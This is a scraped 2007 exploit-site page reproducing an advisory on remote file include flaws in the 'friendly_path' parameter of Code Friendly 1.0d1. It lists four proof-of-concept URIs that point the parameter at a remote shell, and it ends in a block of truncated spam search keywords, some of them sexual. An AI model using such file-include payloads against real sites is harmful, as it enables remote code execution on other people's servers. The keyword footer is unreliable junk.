about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Friendly Friendly_Path Parameter Multiple Remote File Include Vulnerabilities


Title Friendly Friendly_Path Parameter Multiple Remote File Include Vulnerabilities
Published 2007-05-03-12:00AM
Updated 2007-05-07-06:09PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  GolD_M is credited with the discovery of these vulnerabilities.
Vulnerable  Practical Creative & Code Friendly 1.0d1
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/_friendly/core/data/_load.php?friendly_path=shell
http://www.example.com/_friendly/core/data/yaml.inc.php?friendly_path=shell
http://www.example.com/_friendly/core/display/_load.php?friendly_path=shell
http://www.example.com/_friendly/core/support/_load.php?friendly_path=shel
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 05:40:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
xp activat ho8jin.ycc anal sexy girl 18 maxcpm.inf omar DSL www.bt83.c Www.saxygi Invision P www.bizhiz www.hot se bbwsex shakeela n dewi bugil forxlxxx www.tzjfh. Classroom www1638899 www.wg989. wwww89.com /mms/login Unauthoriz com_rss.ht shells gypsysexip Internet e news for c mambo Remo 69.163.32. php-nuke 2 teen girls Joomla Com Www.indian 30 metry fport com_rss.ht hotseximag indean+sex Vidio sex maxcpm.inf wwwsextham inotes www.pzkun. php-nuke 2 SREYASEX.C pzkun.com SHAKILAFIM crm.html%2 crack data